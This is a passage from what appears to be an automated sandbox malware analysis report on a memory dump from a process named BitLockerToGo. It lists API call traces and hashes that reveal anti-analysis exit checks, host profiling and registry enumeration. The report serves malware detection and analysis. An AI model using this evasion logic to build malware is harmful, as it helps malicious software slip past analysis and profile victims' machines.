                                                                                                                                                      • Associated: 00000001.00000002.2061380170.0000000002832000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000283F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000285F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000286B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000028F5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.0000000002915000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000291B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000299A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061933843.00000000029AC000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_1_2_2750000_BitLockerToGo.jbxd
                                                                                                                                                      Yara matches
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessReadmemcpy
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1008454911-0
                                                                                                                                                      • Opcode ID: fe957471f34202ab0f34f131b2ea1cd38dff538baf56da540f9568ab04862220
                                                                                                                                                      • Instruction ID: 12ae0d05e7689dfdc17f5395366d5a6aec7cedda13d80be813245c16e1d98f52
                                                                                                                                                      • Opcode Fuzzy Hash: fe957471f34202ab0f34f131b2ea1cd38dff538baf56da540f9568ab04862220
                                                                                                                                                      • Instruction Fuzzy Hash: 3C310AB4E40218ABDB20CF54DC89BDCB7B4EB48704F5085D9EA09A7280C7756AC58F98
                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 02769860: GetProcAddress.KERNEL32(74DD0000,029D32B0), ref: 027698A1
                                                                                                                                                        • Part of subcall function 02769860: GetProcAddress.KERNEL32(74DD0000,029D32C8), ref: 027698BA
                                                                                                                                                        • Part of subcall function 02769860: GetProcAddress.KERNEL32(74DD0000,029D32E0), ref: 027698D2
                                                                                                                                                        • Part of subcall function 02769860: GetProcAddress.KERNEL32(74DD0000,029D32F8), ref: 027698EA
                                                                                                                                                        • Part of subcall function 02769860: GetProcAddress.KERNEL32(74DD0000,029D3310), ref: 02769903
                                                                                                                                                        • Part of subcall function 02769860: GetProcAddress.KERNEL32(74DD0000,029D3328), ref: 0276991B
                                                                                                                                                        • Part of subcall function 02769860: GetProcAddress.KERNEL32(74DD0000,029D4328), ref: 02769933
                                                                                                                                                        • Part of subcall function 02769860: GetProcAddress.KERNEL32(74DD0000,029D4348), ref: 0276994C
                                                                                                                                                        • Part of subcall function 02769860: GetProcAddress.KERNEL32(74DD0000,029D3338), ref: 02769964
                                                                                                                                                        • Part of subcall function 02769860: GetProcAddress.KERNEL32(74DD0000,029D4368), ref: 0276997C
                                                                                                                                                        • Part of subcall function 02769860: GetProcAddress.KERNEL32(74DD0000,029D4380), ref: 02769995
                                                                                                                                                        • Part of subcall function 02769860: GetProcAddress.KERNEL32(74DD0000,029D04B0), ref: 027699AD
                                                                                                                                                        • Part of subcall function 02769860: GetProcAddress.KERNEL32(74DD0000,029D04C8), ref: 027699C5
                                                                                                                                                        • Part of subcall function 02769860: GetProcAddress.KERNEL32(74DD0000,029D7398), ref: 027699DE
                                                                                                                                                        • Part of subcall function 0276A740: lstrcpy.KERNEL32(02770AEF,00000000), ref: 0276A788
                                                                                                                                                        • Part of subcall function 027511D0: CreateDCA.GDI32(029D0598,00000000,00000000,00000000), ref: 027511E2
                                                                                                                                                        • Part of subcall function 027511D0: GetDeviceCaps.GDI32(?,0000000A), ref: 027511F1
                                                                                                                                                        • Part of subcall function 027511D0: ReleaseDC.USER32(00000000,?), ref: 02751200
                                                                                                                                                        • Part of subcall function 027511D0: ExitProcess.KERNEL32 ref: 02751211
                                                                                                                                                        • Part of subcall function 02751160: GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,02766A17,02770AEF), ref: 0275116A
                                                                                                                                                        • Part of subcall function 02751160: ExitProcess.KERNEL32 ref: 0275117E
                                                                                                                                                        • Part of subcall function 02751110: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000,?,?,02766A1C), ref: 0275112B
                                                                                                                                                        • Part of subcall function 02751110: VirtualAllocExNuma.KERNEL32(00000000,?,?,02766A1C), ref: 02751132
                                                                                                                                                        • Part of subcall function 02751110: ExitProcess.KERNEL32 ref: 02751143
                                                                                                                                                        • Part of subcall function 02751220: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0275123E
                                                                                                                                                        • Part of subcall function 02751220: __aulldiv.LIBCMT ref: 02751258
                                                                                                                                                        • Part of subcall function 02751220: __aulldiv.LIBCMT ref: 02751266
                                                                                                                                                        • Part of subcall function 02751220: ExitProcess.KERNEL32 ref: 02751294
                                                                                                                                                        • Part of subcall function 02766770: GetUserDefaultLangID.KERNEL32(?,?,02766A26,02770AEF), ref: 02766774
                                                                                                                                                      • GetUserDefaultLCID.KERNEL32 ref: 02766A26
                                                                                                                                                        • Part of subcall function 02751190: ExitProcess.KERNEL32 ref: 027511C6
                                                                                                                                                        • Part of subcall function 02767850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,027511B7), ref: 02767880
                                                                                                                                                        • Part of subcall function 02767850: RtlAllocateHeap.NTDLL(00000000), ref: 02767887
                                                                                                                                                        • Part of subcall function 02767850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 0276789F
                                                                                                                                                        • Part of subcall function 027678E0: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,02766A2B), ref: 02767910
                                                                                                                                                        • Part of subcall function 027678E0: RtlAllocateHeap.NTDLL(00000000), ref: 02767917
                                                                                                                                                        • Part of subcall function 027678E0: GetComputerNameA.KERNEL32(?,00000104), ref: 0276792F
                                                                                                                                                        • Part of subcall function 0276A9B0: lstrlen.KERNEL32(?,02771110,?,00000000,02770AEF), ref: 0276A9C5
                                                                                                                                                        • Part of subcall function 0276A9B0: lstrcpy.KERNEL32(00000000), ref: 0276AA04
                                                                                                                                                        • Part of subcall function 0276A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0276AA12
                                                                                                                                                        • Part of subcall function 0276A8A0: lstrcpy.KERNEL32(?,02770AEF), ref: 0276A905
                                                                                                                                                      • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,029D0578,?,0277110C,?,00000000,?,02771110,?,00000000,02770AEF), ref: 02766ACA
                                                                                                                                                      • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 02766AE8
                                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 02766AF9
                                                                                                                                                      • Sleep.KERNEL32(00001770), ref: 02766B04
                                                                                                                                                      • CloseHandle.KERNEL32(?,00000000,?,029D0578,?,0277110C,?,00000000,?,02771110,?,00000000,02770AEF), ref: 02766B1A
                                                                                                                                                      • ExitProcess.KERNEL32 ref: 02766B22
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000001.00000002.2061345852.0000000002750000.00000040.00000400.00020000.00000000.sdmp, Offset: 02750000, based on PE: true
                                                                                                                                                      • Associated: 00000001.00000002.2061364031.000000000276E000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000277B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027AA000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027D5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027D8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027DF000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027E2000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.0000000002801000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000280D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.0000000002832000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000283F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000285F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000286B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000028F5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.0000000002915000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000291B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000299A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061933843.00000000029AC000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_1_2_2750000_BitLockerToGo.jbxd
                                                                                                                                                      Yara matches
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: AddressProc$Process$Exit$Heap$Userlstrcpy$AllocateCloseCreateDefaultEventHandleName__aulldiv$AllocCapsComputerCurrentDeviceGlobalInfoLangMemoryNumaOpenReleaseSleepStatusSystemVirtuallstrcatlstrlen
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1606067472-0
                                                                                                                                                      • Opcode ID: f06d1f8525bbd24ab67317016f0ff65000fd6a0db61c5db719dd26e9f7ffb46a
                                                                                                                                                      • Instruction ID: 07fbae0748b23da44739a2e63126a225962ebe2e647b6d1346628b3a07b75e53
                                                                                                                                                      • Opcode Fuzzy Hash: f06d1f8525bbd24ab67317016f0ff65000fd6a0db61c5db719dd26e9f7ffb46a
                                                                                                                                                      • Instruction Fuzzy Hash: F2311A71D44209AADB06FBF0D85EBFEB77AEF04340F904528E912B6180DF756905CEA5
                                                                                                                                                      APIs
                                                                                                                                                      • RegEnumKeyExA.KERNEL32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 02768426
                                                                                                                                                      • wsprintfA.USER32 ref: 02768459
                                                                                                                                                      • RegOpenKeyExA.KERNEL32(00000000,?,00000000,00020019,00000000), ref: 0276847B
                                                                                                                                                      • RegCloseKey.ADVAPI32(00000000), ref: 0276848C
                                                                                                                                                      • RegCloseKey.ADVAPI32(00000000), ref: 02768499
                                                                                                                                                        • Part of subcall function 0276A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0276A7E6
                                                                                                                                                      • RegQueryValueExA.KERNEL32(00000000,029E5C08,00000000,000F003F,?,00000400), ref: 027684EC
                                                                                                                                                      • lstrlen.KERNEL32(?), ref: 02768501
                                                                                                                                                      • RegQueryValueExA.KERNEL32(00000000,029E5A40,00000000,000F003F,?,00000400,00000000,?,?,00000000,?,02770B34), ref: 02768599
                                                                                                                                                      • RegCloseKey.KERNEL32(00000000), ref: 02768608
                                                                                                                                                      • RegCloseKey.ADVAPI32(00000000), ref: 0276861A
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000001.00000002.2061345852.0000000002750000.00000040.00000400.00020000.00000000.sdmp, Offset: 02750000, based on PE: true
                                                                                                                                                      • Associated: 00000001.00000002.2061364031.000000000276E000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000277B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027AA000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027D5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027D8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027DF000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027E2000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.0000000002801000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000280D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.0000000002832000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000283F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000285F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000286B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000028F5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.0000000002915000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000291B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000299A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061933843.00000000029AC000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_1_2_2750000_BitLockerToGo.jbxd
                                                                                                                                                      Yara matches
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Close$QueryValue$EnumOpenlstrcpylstrlenwsprintf
                                                                                                                                                      • String ID: %s\%s
                                                                                                                                                      • API String ID: 3896182533-4073750446
                                                                                                                                                      • Opcode ID: 2025ecaa53935994f1c9e750d4bd1e030fec435baba7dcba14eaf0338ec0f8f0
                                                                                                                                                      • Instruction ID: e94f2042129039b8b8044caa7335f4bfcfc26b2b28b000447b15d13b087b3660
                                                                                                                                                      • Opcode Fuzzy Hash: 2025ecaa53935994f1c9e750d4bd1e030fec435baba7dcba14eaf0338ec0f8f0
                                                                                                                                                      • Instruction Fuzzy Hash: FA21E9B1954218ABDB24DF54DC89FE9B7B8FB48710F00C5D8E609A6140DF716A85CFD4
                                                                                                                                                      APIs
                                                                                                                                                      • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 027547EA
                                                                                                                                                      • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 02754801
                                                                                                                                                      • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 02754818
                                                                                                                                                      • lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 02754839
                                                                                                                                                      • InternetCrackUrlA.WININET(00000000,00000000), ref: 02754849
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000001.00000002.2061345852.0000000002750000.00000040.00000400.00020000.00000000.sdmp, Offset: 02750000, based on PE: true
                                                                                                                                                      • Associated: 00000001.00000002.2061364031.000000000276E000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000277B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027AA000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027D5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027D8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027DF000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027E2000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.0000000002801000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000280D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.0000000002832000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000283F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000285F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000286B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000028F5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.0000000002915000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000291B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000299A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061933843.00000000029AC000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_1_2_2750000_BitLockerToGo.jbxd
                                                                                                                                                      Yara matches
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ??2@$CrackInternetlstrlen
                                                                                                                                                      • String ID: <
                                                                                                                                                      • API String ID: 1683549937-4251816714
                                                                                                                                                      • Opcode ID: 4f7cdde64bab42acc2160e34550b0b76a281f5b8dfadefd424e9427e5348417f
                                                                                                                                                      • Instruction ID: d492d2cf88bea497fa17aa175f6cabf89976e034fe0373d55950aacf363bf516
                                                                                                                                                      • Opcode Fuzzy Hash: 4f7cdde64bab42acc2160e34550b0b76a281f5b8dfadefd424e9427e5348417f
                                                                                                                                                      • Instruction Fuzzy Hash: F7213BB1D00209ABDF14EFA4E849BEE7B75FF44320F108225E925B7280EB706A15CF91
                                                                                                                                                      APIs
                                                                                                                                                      • GetProcessHeap.KERNEL32(00000000,00000104), ref: 027676A4
                                                                                                                                                      • RtlAllocateHeap.NTDLL(00000000), ref: 027676AB
                                                                                                                                                      • RegOpenKeyExA.KERNEL32(80000002,029E12A0,00000000,00020119,00000000), ref: 027676DD
                                                                                                                                                      • RegQueryValueExA.KERNEL32(00000000,029E5A28,00000000,00000000,?,000000FF), ref: 027676FE
                                                                                                                                                      • RegCloseKey.ADVAPI32(00000000), ref: 02767708
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000001.00000002.2061345852.0000000002750000.00000040.00000400.00020000.00000000.sdmp, Offset: 02750000, based on PE: true
                                                                                                                                                      • Associated: 00000001.00000002.2061364031.000000000276E000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000277B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027AA000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027D5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027D8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027DF000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027E2000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.0000000002801000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000280D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.0000000002832000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000283F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000285F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000286B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000028F5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.0000000002915000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000291B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000299A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061933843.00000000029AC000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_1_2_2750000_BitLockerToGo.jbxd
                                                                                                                                                      Yara matches
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                                                                                                                                      • String ID: Windows 11
                                                                                                                                                      • API String ID: 3225020163-2517555085
                                                                                                                                                      • Opcode ID: d70b1acd6a4449bcb79091e7c6a931d2cc2b38519d0eb1a06e4ca198144aac8d
                                                                                                                                                      • Instruction ID: 8ebeed2b7b169b8b4ccd6ebc13521024d2d2e69aa4dc88cd7fd03a4d719e26a7
                                                                                                                                                      • Opcode Fuzzy Hash: d70b1acd6a4449bcb79091e7c6a931d2cc2b38519d0eb1a06e4ca198144aac8d
                                                                                                                                                      • Instruction Fuzzy Hash: 94014FB5E84205BBDB04DBE9DD4EF7AB7B8EB48715F004854FE0497280E67599108F90
                                                                                                                                                      APIs
                                                                                                                                                      • GetProcessHeap.KERNEL32(00000000,00000104), ref: 02767734
                                                                                                                                                      • RtlAllocateHeap.NTDLL(00000000), ref: 0276773B
                                                                                                                                                      • RegOpenKeyExA.KERNEL32(80000002,029E12A0,00000000,00020119,027676B9), ref: 0276775B
                                                                                                                                                      • RegQueryValueExA.KERNEL32(027676B9,CurrentBuildNumber,00000000,00000000,?,000000FF), ref: 0276777A
                                                                                                                                                      • RegCloseKey.ADVAPI32(027676B9), ref: 02767784
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000001.00000002.2061345852.0000000002750000.00000040.00000400.00020000.00000000.sdmp, Offset: 02750000, based on PE: true
                                                                                                                                                      • Associated: 00000001.00000002.2061364031.000000000276E000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000277B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027AA000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027D5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027D8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027DF000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027E2000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.0000000002801000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000280D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.0000000002832000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000283F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000285F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000286B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000028F5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.0000000002915000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000291B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000299A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061933843.00000000029AC000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_1_2_2750000_BitLockerToGo.jbxd
                                                                                                                                                      Yara matches
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                                                                                                                                      • String ID: CurrentBuildNumber
                                                                                                                                                      • API String ID: 3225020163-1022791448
                                                                                                                                                      • Opcode ID: 1dc4f48afe880a7d613ea284bf54b2929fe9fc3a6da694bc42395822fb4a1722
                                                                                                                                                      • Instruction ID: d01e61120dbf148b8ae836968c3dfdba1a1cf12f1a4e073a5630bfcfb3406d0d
                                                                                                                                                      • Opcode Fuzzy Hash: 1dc4f48afe880a7d613ea284bf54b2929fe9fc3a6da694bc42395822fb4a1722
                                                                                                                                                      • Instruction Fuzzy Hash: 59014FB5E84308BBEB00DBE5DC4EFBEB7B8EB48711F004558FA05A7280D67156108B91
                                                                                                                                                      APIs
                                                                                                                                                      • memset.MSVCRT ref: 027640D5
                                                                                                                                                      • RegOpenKeyExA.KERNEL32(80000001,029E5498,00000000,00020119,?), ref: 027640F4
                                                                                                                                                      • RegQueryValueExA.ADVAPI32(?,029E5E78,00000000,00000000,00000000,000000FF), ref: 02764118
                                                                                                                                                      • RegCloseKey.ADVAPI32(?), ref: 02764122
                                                                                                                                                      • lstrcat.KERNEL32(?,00000000), ref: 02764147
                                                                                                                                                      • lstrcat.KERNEL32(?,029E5EF0), ref: 0276415B
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000001.00000002.2061345852.0000000002750000.00000040.00000400.00020000.00000000.sdmp, Offset: 02750000, based on PE: true
                                                                                                                                                      • Associated: 00000001.00000002.2061364031.000000000276E000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000277B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027AA000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027D5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027D8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027DF000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000027E2000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.0000000002801000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000280D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.0000000002832000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000283F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000285F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000286B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.00000000028F5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.0000000002915000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000291B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061380170.000000000299A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2061933843.00000000029AC000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_1_2_2750000_BitLockerToGo.jbxd
                                                                                                                                                      Yara matches
                                                                                                                                                      Similarity
